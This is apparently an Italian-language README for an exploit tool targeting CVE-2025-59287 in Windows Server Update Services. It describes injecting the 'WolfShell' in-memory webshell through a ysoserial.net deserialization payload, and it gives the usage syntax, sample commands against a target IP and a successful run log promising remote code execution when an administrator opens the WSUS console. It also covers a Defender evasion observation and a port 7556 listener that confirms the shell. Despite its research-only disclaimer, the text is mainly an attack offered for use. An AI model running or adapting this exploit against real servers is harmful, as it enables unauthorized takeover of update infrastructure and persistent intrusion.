
Exploit per CVE-2025-59287, che inietta la webshell in memoria WolfShell nei server WSUS per ottenere l'esecuzione remota di codice quando viene aperta la console di amministrazione.
CVE-2025-59287 — Iniezione di WolfShell Wolverine memory shell in avanti
CVE-2025-59287 sfrutta un difetto logico nei componenti correlati a WSUS per iniettare la memory shell WolfShell nel server di destinazione. Quando un amministratore apre la console WSUS (attivazione predefinita in un intervallo casuale di 1-30 minuti), la memory shell si attiva e causa l'esecuzione remota di codice (RCE). Questo documento include esempi di sfruttamento, file richiesti e raccomandazioni di protezione.
Invia il payload di deserializzazione ysoserial.net al server di destinazione, con funzionalità personalizzabili; questo progetto dimostra l'iniezione della memory shell Wolverine
Usage: CVE-2025-59287 <target_url> <payload_file>
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters
[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

win2019 Defender intercetta e blocca, non utilizzabile

Come mostrato in figura, l'ascolto riuscito sulla porta 7556 indica che la memory shell in avanti Wolverine è stata iniettata


Questo documento è destinato esclusivamente a scopi di ricerca sulla sicurezza e protezione. Non utilizzare il codice di sfruttamento correlato su sistemi non autorizzati o per attività di attacco.